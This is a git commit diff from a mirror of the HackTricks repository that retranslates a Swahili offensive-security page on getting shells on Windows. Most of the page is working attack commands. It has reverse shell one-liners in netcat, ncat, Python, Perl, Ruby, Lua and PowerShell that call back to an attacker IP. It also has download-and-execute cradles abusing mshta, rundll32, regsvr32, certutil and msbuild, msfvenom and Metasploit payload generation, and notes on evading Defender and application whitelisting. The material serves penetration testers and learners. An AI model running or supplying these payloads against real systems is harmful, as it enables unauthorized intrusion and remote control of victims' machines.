mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-25 22:20:43 +00:00
Translated ['generic-methodologies-and-resources/shells/windows.md'] to
This commit is contained in:
parent
98196bd0ca
commit
c6848c5a1c
1 changed files with 78 additions and 79 deletions
|
@ -1,21 +1,21 @@
|
|||
# Shells - Windows
|
||||
|
||||
{% hint style="success" %}
|
||||
Jifunze na zoezi la AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**Mafunzo ya HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
Jifunze na zoezi la GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**Mafunzo ya HackTricks GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary>Support HackTricks</summary>
|
||||
|
||||
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
**Kikundi cha Usalama cha Try Hard**
|
||||
**Try Hard Security Group**
|
||||
|
||||
<figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
|
@ -25,16 +25,29 @@ Jifunze na zoezi la GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" dat
|
|||
|
||||
## Lolbas
|
||||
|
||||
Ukurasa [lolbas-project.github.io](https://lolbas-project.github.io/) ni kwa ajili ya Windows kama [https://gtfobins.github.io/](https://gtfobins.github.io/) ni kwa ajili ya linux.\
|
||||
Kwa dhahiri, **hakuna faili za SUID au mamlaka ya sudo kwenye Windows**, lakini ni muhimu kujua **jinsi** baadhi ya **binari** zinavyoweza kutumika kufanya aina fulani ya vitendo visivyotarajiwa kama **utekelezaji wa nambari za kubahatisha.**
|
||||
Ukurasa [lolbas-project.github.io](https://lolbas-project.github.io/) ni wa Windows kama [https://gtfobins.github.io/](https://gtfobins.github.io/) ni wa linux.\
|
||||
Kwa wazi, **hakuna faili za SUID au ruhusa za sudo katika Windows**, lakini ni muhimu kujua **jinsi** baadhi ya **binaries** zinaweza (kutumika) kutekeleza aina fulani ya vitendo visivyotarajiwa kama **kutekeleza msimbo wa kawaida.**
|
||||
|
||||
## NC
|
||||
```bash
|
||||
nc.exe -e cmd.exe <Attacker_IP> <PORT>
|
||||
```
|
||||
## NCAT
|
||||
mhasiriwa
|
||||
```
|
||||
ncat.exe <Attacker_IP> <PORT> -e "cmd.exe /c (cmd.exe 2>&1)"
|
||||
#Encryption to bypass firewall
|
||||
ncat.exe <Attacker_IP> <PORT eg.443> --ssl -e "cmd.exe /c (cmd.exe 2>&1)"
|
||||
```
|
||||
mshambuliaji
|
||||
```
|
||||
ncat -l <PORT>
|
||||
#Encryption to bypass firewall
|
||||
ncat -l <PORT eg.443> --ssl
|
||||
```
|
||||
## SBD
|
||||
|
||||
**[sbd](https://www.kali.org/tools/sbd/) ni mbadala wa Netcat uliounganifu na salama**. Inafanya kazi kwenye mifumo inayofanana na Unix na Win32. Ikiwa na sifa kama encryption imara, utekelezaji wa programu, bandari za chanzo zinazoweza kubadilishwa, na uunganisho endelevu, sbd hutoa suluhisho la kipekee kwa mawasiliano ya TCP/IP. Kwa watumiaji wa Windows, toleo la sbd.exe kutoka usambazaji wa Kali Linux linaweza kutumika kama mbadala thabiti wa Netcat.
|
||||
**[sbd](https://www.kali.org/tools/sbd/) ni mbadala wa Netcat unaoweza kubebeka na salama**. Inafanya kazi kwenye mifumo ya Unix kama na Win32. Ikiwa na vipengele kama vile usimbaji wa nguvu, utekelezaji wa programu, bandari za chanzo zinazoweza kubadilishwa, na kuunganishwa tena mara kwa mara, sbd inatoa suluhisho la kubadilika kwa mawasiliano ya TCP/IP. Kwa watumiaji wa Windows, toleo la sbd.exe kutoka kwa usambazaji wa Kali Linux linaweza kutumika kama mbadala wa kuaminika wa Netcat.
|
||||
```bash
|
||||
# Victims machine
|
||||
sbd -l -p 4444 -e bash -v -n
|
||||
|
@ -52,44 +65,28 @@ uid=0(root) gid=0(root) groups=0(root)
|
|||
C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"
|
||||
```
|
||||
## Perl
|
||||
|
||||
Perl ni lugha ya programu ambayo inaweza kutumika kwa ufanisi kujenga shell kwenye mfumo wa Windows. Inatoa njia nyingi za kufanya hivyo, kama vile kutumia moduli kama vile `Net::RawIP` au `Net::Pcap`.
|
||||
```bash
|
||||
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
|
||||
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
|
||||
```
|
||||
## Ruby
|
||||
|
||||
### Swahili Translation
|
||||
```bash
|
||||
#Windows
|
||||
ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
|
||||
```
|
||||
## Lua
|
||||
|
||||
Lua ni lugha ya programu ya scripting iliyoundwa kwa kasi na ufanisi. Lua inaweza kutumika kama sehemu ya mchakato wa ukiukaji wa mfumo wa Windows kwa kutekeleza hati za Lua kwenye mfumo uliokaliwa. Lua inaweza kusaidia katika kuanzisha mwingiliano wa mtumiaji wa mwisho na mifumo ya Windows.
|
||||
```bash
|
||||
lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
|
||||
```
|
||||
## OpenSSH
|
||||
|
||||
Mvamizi (Kali)
|
||||
Mshambuliaji (Kali)
|
||||
```bash
|
||||
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate
|
||||
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port> #Here you will be able to introduce the commands
|
||||
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port2> #Here yo will be able to get the response
|
||||
```
|
||||
### Mfano wa Shell ya Windows
|
||||
|
||||
Unapotumia shell ya Windows kwenye mazingira ya Windows, unaweza kutumia njia zifuatazo kusaidia kudumisha ufikiaji wako kwenye mfumo wa shabiki:
|
||||
|
||||
1. **cmd.exe**: Shell ya msingi ya Windows inayotumiwa kwa amri za msingi.
|
||||
2. **Powershell.exe**: Shell yenye nguvu zaidi inayotumiwa kwa amri za PowerShell.
|
||||
3. **wscript.exe**: Inaweza kutumika kutekeleza hati za VBScript.
|
||||
4. **cscript.exe**: Inaweza kutumika kutekeleza hati za VBScript kwenye hali ya amri.
|
||||
5. **wmic.exe**: Inaweza kutumika kutekeleza amri za WMI.
|
||||
6. **Mshta.exe**: Inaweza kutumika kutekeleza hati za HTML Application (HTA).
|
||||
7. **rundll32.exe**: Inaweza kutumika kutekeleza maktaba za DLL.
|
||||
Mtu aliyeathirika
|
||||
```bash
|
||||
#Linux
|
||||
openssl s_client -quiet -connect <ATTACKER_IP>:<PORT1>|/bin/bash|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>
|
||||
|
@ -104,17 +101,19 @@ powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000
|
|||
Start-Process -NoNewWindow powershell "IEX(New-Object Net.WebClient).downloadString('http://10.222.0.26:8000/ipst.ps1')"
|
||||
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile
|
||||
```
|
||||
Mchakato unatekeleza wito wa mtandao: **powershell.exe**\
|
||||
Mzigo ulioandikwa kwenye diski: **HAPANA** (_angalau mahali popote nilipoweza kupata kwa kutumia procmon!_)
|
||||
Mchakato unaofanya wito wa mtandao: **powershell.exe**\
|
||||
Payload imeandikwa kwenye diski: **HAPANA** (_angalau sio mahali popote nilipoweza kupata kwa kutumia procmon !_ )
|
||||
```bash
|
||||
powershell -exec bypass -f \\webdavserver\folder\payload.ps1
|
||||
```
|
||||
Mchakato unaoendesha wito wa mtandao: **svchost.exe**\
|
||||
Mzigo ulioandikwa kwenye diski: **Hifadhi ya ndani ya mteja wa WebDAV**
|
||||
Mchakato unaofanya wito wa mtandao: **svchost.exe**\
|
||||
Malipo yaliyoandikwa kwenye diski: **WebDAV client local cache**
|
||||
|
||||
**Mstari mmoja:**
|
||||
```bash
|
||||
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
|
||||
```
|
||||
**Pata habari zaidi kuhusu Mabakuli tofauti ya Powershell mwishoni mwa hati hii**
|
||||
**Pata maelezo zaidi kuhusu Shells tofauti za Powershell mwishoni mwa hati hii**
|
||||
|
||||
## Mshta
|
||||
|
||||
|
@ -130,11 +129,11 @@ mshta http://webserver/payload.hta
|
|||
```bash
|
||||
mshta \\webdavserver\folder\payload.hta
|
||||
```
|
||||
#### **Mfano wa ganda la nyuma la hta-psh (tumia hta kupakua na kutekeleza mlango wa nyuma wa PS)**
|
||||
#### **Mfano wa hta-psh reverse shell (tumia hta kupakua na kutekeleza PS backdoor)**
|
||||
```xml
|
||||
<scRipt language="VBscRipT">CreateObject("WscrIpt.SheLL").Run "powershell -ep bypass -w hidden IEX (New-ObjEct System.Net.Webclient).DownloadString('http://119.91.129.12:8080/1.ps1')"</scRipt>
|
||||
```
|
||||
**Unaweza kupakua na kutekeleza kwa urahisi sana mzimu wa Koadic ukitumia stager hta**
|
||||
**Unaweza kupakua na kutekeleza kwa urahisi sana Koadic zombie ukitumia stager hta**
|
||||
|
||||
#### mfano wa hta
|
||||
|
||||
|
@ -182,14 +181,14 @@ msf exploit(windows/misc/hta_server) > exploit
|
|||
```bash
|
||||
Victim> mshta.exe //192.168.1.109:8080/5EEiDSd70ET0k.hta #The file name is given in the output of metasploit
|
||||
```
|
||||
**Imegunduliwa na msimamizi**
|
||||
**Gunduliwa na mlinzi**
|
||||
|
||||
|
||||
|
||||
|
||||
## **Rundll32**
|
||||
|
||||
[**Mfano wa Dll ya hello world**](https://github.com/carterjones/hello-world-dll)
|
||||
[**Mfano wa dll hello world**](https://github.com/carterjones/hello-world-dll)
|
||||
|
||||
* [Kutoka hapa](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
|
||||
```bash
|
||||
|
@ -199,7 +198,7 @@ rundll32 \\webdavserver\folder\payload.dll,entrypoint
|
|||
```bash
|
||||
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();
|
||||
```
|
||||
**Imegunduliwa na msimamizi**
|
||||
**Imegunduliwa na mlinzi**
|
||||
|
||||
**Rundll32 - sct**
|
||||
|
||||
|
@ -243,7 +242,7 @@ regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
|
|||
```
|
||||
regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll
|
||||
```
|
||||
**Imegunduliwa na msimamizi**
|
||||
**Imepatikana na mlinzi**
|
||||
|
||||
#### Regsvr32 -sct
|
||||
|
||||
|
@ -273,21 +272,21 @@ set lhost 10.2.0.5
|
|||
run
|
||||
#You will be given the command to run in the victim: regsvr32 /s /n /u /i:http://10.2.0.5:8080/82j8mC8JBblt.sct scrobj.dll
|
||||
```
|
||||
**Unaweza kupakua na kutekeleza kwa urahisi sana koadic zombie ukitumia stager regsvr**
|
||||
**Unaweza kupakua na kutekeleza kwa urahisi Koadic zombie ukitumia stager regsvr**
|
||||
|
||||
## Certutil
|
||||
|
||||
* [Kutoka hapa](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
|
||||
|
||||
Pakua B64dll, itafsiri na kutekeleza.
|
||||
Pakua B64dll, ikode na uitekeleze.
|
||||
```bash
|
||||
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll
|
||||
```
|
||||
Pakua B64exe, itafsiri na tekeleza.
|
||||
Pakua B64exe, ikode na uiendeshe.
|
||||
```bash
|
||||
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe
|
||||
```
|
||||
**Kugunduliwa na msimamizi**
|
||||
**Imepatikana na mlinzi**
|
||||
|
||||
|
||||
## **Cscript/Wscript**
|
||||
|
@ -298,14 +297,14 @@ powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://10.2.0
|
|||
```bash
|
||||
msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 -f vbs > shell.vbs
|
||||
```
|
||||
**Kugunduliwa na msimamizi**
|
||||
**Imepatikana na mlinzi**
|
||||
|
||||
## PS-Bat
|
||||
```bash
|
||||
\\webdavserver\folder\batchfile.bat
|
||||
```
|
||||
Mchakato unaoendesha wito wa mtandao: **svchost.exe**\
|
||||
Mzigo ulioandikwa kwenye diski: **Hifadhi ya ndani ya mteja wa WebDAV**
|
||||
Mchakato unaofanya wito wa mtandao: **svchost.exe**\
|
||||
Malipo yaliyoandikwa kwenye diski: **WebDAV client local cache**
|
||||
```bash
|
||||
msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 > shell.bat
|
||||
impacket-smbserver -smb2support kali `pwd`
|
||||
|
@ -314,7 +313,7 @@ impacket-smbserver -smb2support kali `pwd`
|
|||
```bash
|
||||
\\10.8.0.3\kali\shell.bat
|
||||
```
|
||||
**Kugunduliwa na msimamizi**
|
||||
**Imepatikana na mlinzi**
|
||||
|
||||
## **MSIExec**
|
||||
|
||||
|
@ -323,11 +322,11 @@ Mshambuliaji
|
|||
msfvenom -p windows/meterpreter/reverse_tcp lhost=10.2.0.5 lport=1234 -f msi > shell.msi
|
||||
python -m SimpleHTTPServer 80
|
||||
```
|
||||
Mkubwa:
|
||||
Mtu aliyeathirika:
|
||||
```
|
||||
victim> msiexec /quiet /i \\10.2.0.5\kali\shell.msi
|
||||
```
|
||||
**Imebainika**
|
||||
**Imepatikana**
|
||||
|
||||
## **Wmic**
|
||||
|
||||
|
@ -347,9 +346,9 @@ var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c echo IEX(New-Object N
|
|||
</ms:script>
|
||||
</stylesheet>
|
||||
```
|
||||
**Haijagunduliwa**
|
||||
**Haijatambuliwa**
|
||||
|
||||
**Unaweza kupakua na kutekeleza kwa urahisi sana zombi wa Koadic ukitumia stager wmic**
|
||||
**Unaweza kupakua na kutekeleza kwa urahisi Koadic zombie ukitumia stager wmic**
|
||||
|
||||
## Msbuild
|
||||
|
||||
|
@ -357,22 +356,22 @@ var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c echo IEX(New-Object N
|
|||
```
|
||||
cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"
|
||||
```
|
||||
Unaweza kutumia mbinu hii kukiuka Orodha ya Maombi na vizuizi vya Powershell.exe. Kama utaulizwa na kifaa cha PS shell.\
|
||||
Pakua hii na kuitekeleza: [https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj](https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj)
|
||||
Unaweza kutumia mbinu hii kupita vikwazo vya Application Whitelisting na Powershell.exe. Kwa hivyo utaonyeshwa na PS shell.\
|
||||
Pakua hii na uifanye: [https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj](https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj)
|
||||
```
|
||||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildShell.csproj
|
||||
```
|
||||
**Haijagunduliwa**
|
||||
**Haitambuliwi**
|
||||
|
||||
## **CSC**
|
||||
|
||||
Kusanya msimbo wa C# kwenye mashine ya mwathiriwa.
|
||||
Kusanya msimbo wa C# kwenye mashine ya mwathirika.
|
||||
```
|
||||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:shell.exe shell.cs
|
||||
```
|
||||
Unaweza kupakua ganda la kurudisha nyuma la C# la msingi kutoka hapa: [https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc](https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc)
|
||||
Unaweza kupakua shell ya msingi ya C# kutoka hapa: [https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc](https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc)
|
||||
|
||||
**Hakijagunduliwa**
|
||||
**Haijagundulika**
|
||||
|
||||
## **Regasm/Regsvc**
|
||||
|
||||
|
@ -394,37 +393,37 @@ odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}
|
|||
|
||||
[**https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2**](https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2)
|
||||
|
||||
## Powesheli Shells
|
||||
## Powershell Shells
|
||||
|
||||
### PS-Nishang
|
||||
|
||||
[https://github.com/samratashok/nishang](https://github.com/samratashok/nishang)
|
||||
|
||||
Katika folda ya **Shells**, kuna mabaka mengi tofauti. Ili kupakua na kutekeleza Invoke-_PowerShellTcp.ps1_ fanya nakala ya hati na ongeza mwishoni mwa faili:
|
||||
Katika folda ya **Shells**, kuna shells nyingi tofauti. Ili kupakua na kutekeleza Invoke-_PowerShellTcp.ps1_, fanya nakala ya script na ongeza mwishoni mwa faili:
|
||||
```
|
||||
Invoke-PowerShellTcp -Reverse -IPAddress 10.2.0.5 -Port 4444
|
||||
```
|
||||
Anza kuhudumia script kwenye seva ya wavuti na kuitekeleza kwenye mwisho wa muathiriwa:
|
||||
Anza kuhudumia script kwenye seva ya wavuti na uitekeleze upande wa mwathirika:
|
||||
```
|
||||
powershell -exec bypass -c "iwr('http://10.11.0.134/shell2.ps1')|iex"
|
||||
```
|
||||
Defender haiichunguzi kama nambari inayoweza kudhuru (bado, 3/04/2019).
|
||||
Defender haitambui kama msimbo mbaya (bado, 3/04/2019).
|
||||
|
||||
**TODO: Angalia mabakaingine ya nishang**
|
||||
**TODO: Angalia nishang shells nyingine**
|
||||
|
||||
### **PS-Powercat**
|
||||
|
||||
[**https://github.com/besimorhino/powercat**](https://github.com/besimorhino/powercat)
|
||||
|
||||
Pakua, anzisha seva ya wavuti, anzisha msikilizaji, na itekeleze kwenye mwisho wa mhanga:
|
||||
Pakua, anzisha seva ya wavuti, anzisha msikilizaji, na uite kwenye upande wa mwathirika:
|
||||
```
|
||||
powershell -exec bypass -c "iwr('http://10.2.0.5/powercat.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd"
|
||||
```
|
||||
Defender haiigundui kama nambari inayoweza kudhuru (bado, 3/04/2019).
|
||||
Defender haitambui kama msimbo mbaya (bado, 3/04/2019).
|
||||
|
||||
**Chaguo zingine zinazotolewa na powercat:**
|
||||
**Chaguzi nyingine zinazotolewa na powercat:**
|
||||
|
||||
Bind shells, Reverse shell (TCP, UDP, DNS), Port redirect, kupakia/kupakua, Zalisha mizigo, Toa faili...
|
||||
Bind shells, Reverse shell (TCP, UDP, DNS), Port redirect, upload/download, Generate payloads, Serve files...
|
||||
```
|
||||
Serve a cmd Shell:
|
||||
powercat -l -p 443 -e cmd
|
||||
|
@ -445,17 +444,17 @@ powercat -l -p 443 -i C:\inputfile -rep
|
|||
|
||||
[https://github.com/EmpireProject/Empire](https://github.com/EmpireProject/Empire)
|
||||
|
||||
Tengeneza mizizi ya powershell, iihifadhi kwenye faili na uipakue na kuitekeleza.
|
||||
Unda launcher ya powershell, ihifadhi kwenye faili na uipakue na kuitekeleza.
|
||||
```
|
||||
powershell -exec bypass -c "iwr('http://10.2.0.5/launcher.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd"
|
||||
```
|
||||
**Imedhamiriwa kama msimbo mbaya**
|
||||
**Imegundulika kama msimbo mbaya**
|
||||
|
||||
### MSF-Unicorn
|
||||
|
||||
[https://github.com/trustedsec/unicorn](https://github.com/trustedsec/unicorn)
|
||||
|
||||
Tengeneza toleo la powershell la mlango wa nyuma wa metasploit kwa kutumia kifaa cha kichawi
|
||||
Unda toleo la powershell la backdoor ya metasploit kwa kutumia unicorn
|
||||
```
|
||||
python unicorn.py windows/meterpreter/reverse_https 10.2.0.5 443
|
||||
```
|
||||
|
@ -463,19 +462,19 @@ Anza msfconsole na rasilimali iliyoundwa:
|
|||
```
|
||||
msfconsole -r unicorn.rc
|
||||
```
|
||||
Anza server ya wavuti ikitoa faili ya _powershell\_attack.txt_ na tekeleza kwa muathiriwa:
|
||||
Anza seva ya wavuti inayotoa faili _powershell\_attack.txt_ na utekeleze katika mwathiriwa:
|
||||
```
|
||||
powershell -exec bypass -c "iwr('http://10.2.0.5/powershell_attack.txt')|iex"
|
||||
```
|
||||
**Imedetektiwa kama msimbo wa hatari**
|
||||
**Imepatikana kama msimbo mbaya**
|
||||
|
||||
## Zaidi
|
||||
|
||||
[PS>Shambulio](https://github.com/jaredhaight/PSAttack) PS console na moduli za PS zenye uchokozi zilizopakiwa mapema (zilizofichwa)\
|
||||
[PS>Attack](https://github.com/jaredhaight/PSAttack) PS console yenye baadhi ya moduli za PS za kushambulia zilizopakiwa (cyphered)\
|
||||
[https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f9](https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f93c)[\
|
||||
WinPWN](https://github.com/SecureThisShit/WinPwn) PS console na moduli za PS zenye uchokozi na uchunguzi wa proksi (IEX)
|
||||
WinPWN](https://github.com/SecureThisShit/WinPwn) PS console yenye baadhi ya moduli za PS za kushambulia na ugunduzi wa proxy (IEX)
|
||||
|
||||
## Marejeo
|
||||
## Marejeleo
|
||||
|
||||
* [https://highon.coffee/blog/reverse-shell-cheat-sheet/](https://highon.coffee/blog/reverse-shell-cheat-sheet/)
|
||||
* [https://gist.github.com/Arno0x](https://gist.github.com/Arno0x)
|
||||
|
@ -485,23 +484,23 @@ WinPWN](https://github.com/SecureThisShit/WinPwn) PS console na moduli za PS zen
|
|||
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)
|
||||
* [https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
|
||||
|
||||
**Kikundi cha Usalama cha Kujitahidi**
|
||||
**Jaribu Kikundi cha Usalama wa Juu**
|
||||
|
||||
<figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://discord.gg/tryhardsecurity" %}
|
||||
|
||||
{% hint style="success" %}
|
||||
Jifunze & zoezi la Udukuzi wa AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**Mafunzo ya HackTricks AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
Jifunze & zoezi la Udukuzi wa GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**Mafunzo ya HackTricks GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
Jifunze & fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
Jifunze & fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary>unga mkono HackTricks</summary>
|
||||
<summary>Support HackTricks</summary>
|
||||
|
||||
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
|
||||
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
